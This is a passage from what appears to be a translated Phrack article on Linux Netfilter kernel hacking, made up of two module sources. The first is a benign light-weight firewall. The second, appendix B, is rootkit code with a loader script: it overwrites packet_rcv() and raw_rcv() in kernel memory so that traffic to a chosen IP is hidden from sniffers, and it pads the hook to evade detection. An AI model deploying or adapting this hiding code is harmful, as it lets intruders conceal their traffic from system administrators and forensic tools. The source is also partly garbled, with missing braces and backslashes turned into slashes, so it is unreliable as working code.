   if (deny_ip && DENY_IP_ACTIVE) {
      ret = check_ip_packet(*skb);
      if (ret != NF_ACCEPT) return ret;
   /* Finally, check the TCP port rule */
   if (deny_port && DENY_PORT_ACTIVE) {
      ret = check_tcp_packet(*skb);
      if (ret != NF_ACCEPT) return ret;
   return NF_ACCEPT;               /* We are happy to keep the packet */

/* Function to copy the LWFW statistics to a userspace buffer */
static int copy_stats(struct lwfw_stats *statbuff)

copy_to_user(statbuff, &lwfw_statistics,
        sizeof(struct lwfw_stats));
   return 0;

/* Function that compares a received TCP packet's destination port
* with the port specified in the Port Deny Rule. If a processing
* error occurs, NF_ACCEPT will be returned so that the packet is
* not lost. */
static int check_tcp_packet(struct sk_buff *skb)
   /* Seperately defined pointers to header structures are used
    * to access the TCP fields because it seems that the so-called
    * transport header from skb is the same as its network header TCP packets.
    * If you don't believe me then print the addresses of skb->nh.iph
    * and skb->h.th. 
    * It would have been nicer if the network header only was IP and
    * the transport header was TCP but what can you do? */
   struct tcphdr *thead;
   /* We don't want any NULL pointers in the chain to the TCP header. */
   if (!skb ) return NF_ACCEPT;
   if (!(skb->nh.iph)) return NF_ACCEPT;

/* Be sure this is a TCP packet first */
   if (skb->nh.iph->protocol != IPPROTO_TCP) {
      return NF_ACCEPT;

thead = (struct tcphdr *)(skb->data + (skb->nh.iph->ihl * 4));
   /* Now check the destination port */
   if ((thead->dest) == deny_port) {
      /* Update statistics */
      return NF_DROP;
   return NF_ACCEPT;

/* Function that compares a received IPv4 packet's source address
* with the address specified in the IP Deny Rule. If a processing
* error occurs, NF_ACCEPT will be returned so that the packet is
* not lost. */
static int check_ip_packet(struct sk_buff *skb)
   /* We don't want any NULL pointers in the chain to the IP header. */
   if (!skb ) return NF_ACCEPT;
   if (!(skb->nh.iph)) return NF_ACCEPT;
   if (skb->nh.iph->saddr == deny_ip) {/* Matches the address. Barf. */
      lwfw_statistics.ip_dropped++;    /* Update the statistics */
      return NF_DROP;
   return NF_ACCEPT;

static int set_if_rule(char *name)
   int ret = 0;
   char *if_dup;               /* Duplicate interface */
   /* Make sure the name is non-null */
   /* Free any previously saved interface name */
   if (deny_if) {
      deny_if = NULL;
   if ((if_dup = kmalloc(strlen((char *)name) + 1, GFP_KERNEL))
        == NULL) {
      ret = -ENOMEM;
   } else {
      memset(if_dup, 0x00, strlen((char *)name) + 1);
      memcpy(if_dup, (char *)name, strlen((char *)name));

deny_if = if_dup;
   lwfw_statistics.if_dropped = 0;     /* Reset drop count for IF rule */
   printk("LWFW: Set to deny from interface: %s/n", deny_if);
   return ret;

static int set_ip_rule(unsigned int ip)
   deny_ip = ip;
   lwfw_statistics.ip_dropped = 0;     /* Reset drop count for IP rule */
   printk("LWFW: Set to deny from IP address: %d.%d.%d.%d/n",
      ip & 0x000000FF, (ip & 0x0000FF00) >> 8,
      (ip & 0x00FF0000) >> 16, (ip & 0xFF000000) >> 24);
   return 0;

static int set_port_rule(unsigned short port)
   deny_port = port;
   lwfw_statistics.tcp_dropped = 0;    /* Reset drop count for TCP rule */
   printk("LWFW: Set to deny for TCP port: %d/n",
      ((port & 0xFF00) >> 8 | (port & 0x00FF) << 8));
   return 0;

* File operations functions for control device
static int lwfw_ioctl(struct inode *inode, struct file *file,
              unsigned int cmd, unsigned long arg)
   int ret = 0;
   switch (cmd) {
    case LWFW_GET_VERS:
      return LWFW_VERS;
    case LWFW_ACTIVATE: {
       active = 1;
       printk("LWFW: Activated./n");
       if (!deny_if && !deny_ip && !deny_port) {
      printk("LWFW: No deny options set./n");
       active ^= active;
       printk("LWFW: Deactivated./n");
    case LWFW_GET_STATS: {
       ret = copy_stats((struct lwfw_stats *)arg);
    case LWFW_DENY_IF: {
       ret = set_if_rule((char *)arg);
    case LWFW_DENY_IP: {
       ret = set_ip_rule((unsigned int)arg);
    case LWFW_DENY_PORT: {
       ret = set_port_rule((unsigned short)arg);
      ret = -EBADRQC;
   return ret;

/* Called whenever open() is called on the device file */
static int lwfw_open(struct inode *inode, struct file *file)
   if (lwfw_ctrl_in_use) {
      return -EBUSY;
   } else {
      return 0;
   return 0;

/* Called whenever close() is called on the device file */
static int lwfw_release(struct inode *inode, struct file *file)
   lwfw_ctrl_in_use ^= lwfw_ctrl_in_use;
   return 0;

* Module initialisation and cleanup follow...
int init_module()
   /* Register the control device, /dev/lwfw */
   /* Attempt to register the LWFW control device */
   if ((major = register_chrdev(LWFW_MAJOR, LWFW_NAME,
                &lwfw_fops)) < 0) {
      printk("LWFW: Failed registering control device!/n");
      printk("LWFW: Module installation aborted./n");
      return major;
   /* Make sure the usage marker for the control device is cleared */
   lwfw_ctrl_in_use ^= lwfw_ctrl_in_use;

printk("/nLWFW: Control device successfully registered./n");
   /* Now register the network hooks */
   nfkiller.hook = lwfw_hookfn;
   nfkiller.hooknum = NF_IP_PRE_ROUTING;   /* First stage hook */
   nfkiller.pf = PF_INET;               /* IPV4 protocol hook */
   nfkiller.priority = NF_IP_PRI_FIRST;    /* Hook to come first */
   /* And register... */
   printk("LWFW: Network hooks successfully installed./n");
   printk("LWFW: Module installation successful./n");
   return 0;

void cleanup_module()
   int ret;
   /* Remove IPV4 hook */

/* Now unregister control device */
   if ((ret = unregister_chrdev(LWFW_MAJOR, LWFW_NAME)) != 0) {
      printk("LWFW: Removal of module failed!/n");

/* If anything was allocated for the deny rules, free it here */
   if (deny_if)
   printk("LWFW: Removal of module successful./n");

----[ A.3 - 头文件 : lwfw.h

<++> lwfw/lwfw.h
/* Include file for the Light-weight Fire Wall LKM.

* A very simple Netfilter module that drops backets based on either
* their incoming interface or source IP address.

* Written by bioforge  -  March 2003

#ifndef __LWFW_INCLUDE__
# define __LWFW_INCLUDE__

/* NOTE: The LWFW_MAJOR symbol is only made available for kernel code.
* Userspace code has no business knowing about it. */
# define LWFW_NAME        "lwfw"

/* Version of LWFW */
# define LWFW_VERS        0x0001       /* 0.1 */

/* Definition of the LWFW_TALKATIVE symbol controls whether LWFW will
* print anything with printk(). This is included for debugging purposes.

/* These are the IOCTL codes used for the control device */
#define LWFW_CTRL_SET   0xFEED0000     /* The 0xFEED... prefix is arbitrary */
#define LWFW_GET_VERS   0xFEED0001     /* Get the version of LWFM */
#define LWFW_ACTIVATE   0xFEED0002
#define LWFW_GET_STATS  0xFEED0004
#define LWFW_DENY_IF    0xFEED0005
#define LWFW_DENY_IP    0xFEED0006
#define LWFW_DENY_PORT  0xFEED0007

/* Control flags/Options */
#define LWFW_IF_DENY_ACTIVE   0x00000001
#define LWFW_IP_DENY_ACTIVE   0x00000002
#define LWFW_PORT_DENY_ACTIVE 0x00000004

/* Statistics structure for LWFW.
* Note that whenever a rule's condition is changed the related
* xxx_dropped field is reset.
struct lwfw_stats {
   unsigned int if_dropped;           /* Packets dropped by interface rule */
   unsigned int ip_dropped;           /* Packets dropped by IP addr. rule */
   unsigned int tcp_dropped;           /* Packets dropped by TCP port rule */
   unsigned long total_dropped;   /* Total packets dropped */
   unsigned long total_seen;      /* Total packets seen by filter */

* From here on is used solely for the actual kernel module
#ifdef __KERNEL__
# define LWFW_MAJOR       241   /* This exists in the experimental range */

/* This macro is used to prevent dereferencing of NULL pointers. If
* a pointer argument is NULL, this will return -EINVAL */
#define NULL_CHECK(ptr)    /
   if ((ptr) == NULL)  return -EINVAL

/* Macros for accessing options */
#define DENY_IF_ACTIVE    (lwfw_options & LWFW_IF_DENY_ACTIVE)
#define DENY_IP_ACTIVE    (lwfw_options & LWFW_IP_DENY_ACTIVE)
#define DENY_PORT_ACTIVE  (lwfw_options & LWFW_PORT_DENY_ACTIVE)

#endif                       /* __KERNEL__ */

<++> lwfw/Makefile
CC= egcs
CFLAGS= -Wall -O2
OBJS= lwfw.o

    $(CC) -c $< -o $@ $(CFLAGS)

all: $(OBJS)

    rm -rf *.o
    rm -rf ./*~

--[ B - 第6节中的源代码

这里给出的是一个劫持packet_rcv()和raw_rcv()函数以隐藏来自或去往我们指定的IP地址的数据包的简单模块。默认的IP地址被设置为127.0.0.1,但是可以通过改变#define IP的值来改变它。还有一个bash脚本,用于从System.map文件中获取需要的函数的入口地址,并且以需要的格式将这些地址做为参数来运行insmod命令。这个加载脚本是grem所写。原用于我的Mod-off项目,很容易修改它使之适用于这里给出的模块。再次感谢 grem。

<++> pcaphide/pcap_block.c
/* Kernel hack that will hijack the packet_rcv() function
* which is used to pass packets to  Libpcap applications
* that use  PACKET sockets.  Also  hijacks the raw_rcv()
* function. This is used to pass packets to applications
* that open RAW sockets.

* Written by bioforge  -  30th June, 2003

#define MODULE
#define __KERNEL__

#include <linux/config.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/netdevice.h>
#include <linux/skbuff.h>
#include <linux/smp_lock.h>
#include <linux/ip.h>               /* For struct ip */
#include <linux/if_ether.h>           /* For ETH_P_IP */

#include <asm/page.h>               /* For PAGE_OFFSET */

* IP address to hide in NBO for Intel */
#define IP    htonl(0x7F000001)

/* Function pointer for original packet_rcv() */
static int (*pr)(struct sk_buff *skb, struct net_device *dev,
          struct packet_type *pt);
MODULE_PARM(pr, "i");       /* Retrieved as insmod parameter */

/* Function pointer for original raw_rcv() */
static int (*rr)(struct sock *sk, struct sk_buff *skb);
MODULE_PARM(rr, "i");

/* Spinlock used for the parts where we un/hijack packet_rcv() */
static spinlock_t hijack_lock  = SPIN_LOCK_UNLOCKED;

/* Helper macros for use with the Hijack spinlock */
#define HIJACK_LOCK    spin_lock_irqsave(&hijack_lock, /
#define HIJACK_UNLOCK  spin_unlock_irqrestore(&hijack_lock, /

#define CODESIZE 10
/* Original and hijack code buffers.
* Note that the hijack code also provides 3 additional
* bytes ( inc eax;  nop;  dec eax ) to try and throw
* simple hijack detection techniques that just look for
* a move and a jump. */
/* For packet_rcv() */
static unsigned char pr_code[CODESIZE] = "/xb8/x00/x00/x00/x00"
static unsigned char pr_orig[CODESIZE];

/* For raw_rcv() */
static unsigned char rr_code[CODESIZE] = "/xb8/x00/x00/x00/x00"
static unsigned char rr_orig[CODESIZE];

/* Replacement for packet_rcv(). This is currently setup to hide
* all packets with a source or destination IP address that we
* specify. */
int hacked_pr(struct sk_buff *skb, struct net_device *dev,
           struct packet_type *pt)
    int sl_flags;               /* Flags for spinlock */
    int retval;

/* Check if this is an IP packet going to or coming from our
     * hidden IP address. */
    if (skb->protocol == htons(ETH_P_IP))   /* IP packet */
      if (skb->nh.iph->saddr == IP || skb->nh.iph->daddr == IP)
    return 0;            /* Ignore this packet */
    /* Call original */
    memcpy((char *)pr, pr_orig, CODESIZE);
    retval = pr(skb, dev, pt);
    memcpy((char *)pr, pr_code, CODESIZE);

return retval;

/* Replacement for raw_rcv(). This is currently setup to hide
* all packets with a source or destination IP address that we
* specify. */
int hacked_rr(struct sock *sock, struct sk_buff *skb)
    int sl_flags;               /* Flags for spinlock */
    int retval;

/* Check if this is an IP packet going to or coming from our
     * hidden IP address. */
    if (skb->protocol == htons(ETH_P_IP))   /* IP packet */
      if (skb->nh.iph->saddr == IP || skb->nh.iph->daddr == IP)
    return 0;            /* Ignore this packet */
    /* Call original */
    memcpy((char *)rr, rr_orig, CODESIZE);
    retval = rr(sock, skb);
    memcpy((char *)rr, rr_code, CODESIZE);

return retval;

int init_module()
    int sl_flags;               /* Flags for spinlock */
    /* pr & rr set as module parameters. If zero or < PAGE_OFFSET
     * (which we treat as the lower bound of kernel memory), then
     * we will not install the hacks. */
    if ((unsigned int)pr == 0 || (unsigned int)pr < PAGE_OFFSET) {
    printk("Address for packet_rcv() not valid! (%08x)/n",
    return -1;
    if ((unsigned int)rr == 0 || (unsigned int)rr < PAGE_OFFSET) {
    printk("Address for raw_rcv() not valid! (%08x)/n",
    return -1;
    *(unsigned int *)(pr_code + 1) = (unsigned int)hacked_pr;
    *(unsigned int *)(rr_code + 1) = (unsigned int)hacked_rr;
    memcpy(pr_orig, (char *)pr, CODESIZE);
    memcpy((char *)pr, pr_code, CODESIZE);
    memcpy(rr_orig, (char *)rr, CODESIZE);
    memcpy((char *)rr, rr_code, CODESIZE);
    return 0;

void cleanup_module()
    int sl_flags;
    memcpy((char *)pr, pr_orig, CODESIZE);
    memcpy((char *)rr, rr_orig, CODESIZE);

<++> pcaphide/loader.sh
#  Written by  grem, 30th June 2003
#  Hacked by bioforge, 30th June 2003

if [ "$1" = "" ]; then
        echo "Use: $0 <System.map>";

PR=`cat $MAP | grep -w "packet_rcv" | cut -c 1-16`
RR=`cat $MAP | grep -w "raw_rcv" | cut -c 1-16`

if [ "$PR" = "" ]; then
if [ "$RR" = "" ]; then

echo "insmod pcap_block.o pr=0x$PR rr=0x$RR"

# Now do the actual call to insmod
insmod pcap_block.o pr=0x$PR rr=0x$RR

<++> pcaphide/Makefile
CC= gcc
CFLAGS= -Wall -O2 -fomit-frame-pointer
INCLUDES= -I/usr/src/linux/include
OBJS= pcap_block.o

    $(CC) -c $< -o $@ $(CFLAGS) $(INCLUDES)

all: $(OBJS)

    rm -rf *.o
    rm -rf ./*~
